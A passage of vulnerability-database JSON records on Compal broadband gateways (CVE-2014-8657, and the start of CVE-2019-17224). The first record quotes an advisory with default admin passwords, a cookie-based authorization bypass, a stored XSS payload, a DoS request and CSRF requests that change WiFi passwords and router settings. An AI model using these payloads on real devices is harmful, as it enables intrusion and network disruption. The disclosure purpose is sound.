"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0180",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "70762"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 0.4
},
"cve": "CVE-2014-8657",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8657",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-76602",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8657",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8657",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-192",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76602",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities\n2. A denial-of-service vulnerability\n3. An HTML-injection vulnerability\n4. Other attacks are also possible. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. 
\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET 
http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76602",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76602"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8657",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.6
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113838",
"trust": 1.8
},
{
"db": "BID",
"id": "70762",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "XF",
"id": "98330",
"trust": 0.6
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76602",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"id": "VAR-201411-0180",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.379000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98330"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8657"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/98330"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76602"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"date": "2014-11-06T15:55:10.960000",
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76602"
},
{
"date": "2014-12-03T00:56:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Service disruption in other firmware (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
}
],
"trust": 0.6
}
}
VAR-201910-0452
Vulnerability from variot - Updated: 2024-11-23 23:11
The web interface of the Compal Broadband CH7465LG modem (version CH7465LG-NCIP-6.12.18.25-2p6-NOSH) is vulnerable to a /%2f/ path traversal attack, which can be exploited to test whether a file pathname exists outside the web root directory. If a file exists but is not part of the product, the response is a 404 error; if a file does not exist, the response is a 302 redirect to index.html. The differing responses therefore reveal whether a given path exists on the device. The Compal Broadband CH7465LG modem contains a path traversal vulnerability. Information may be obtained. The Compal Broadband CH7465LG is a modem from Compal, Taiwan.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0452",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.6,
"vendor": "compal",
"version": "ch7465lg-ncip-6.12.18.25-2p6-nosh"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch7465lg-ncip-6.12.18.25-2p6-nosh"
},
{
"model": "broadband ch7465lg modem ch7465lg-ncip-6.12.18.25-2p6-nosh",
"scope": null,
"trust": 0.6,
"vendor": "compal",
"version": null
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
}
]
},
"cve": "CVE-2019-17224",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-17224",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
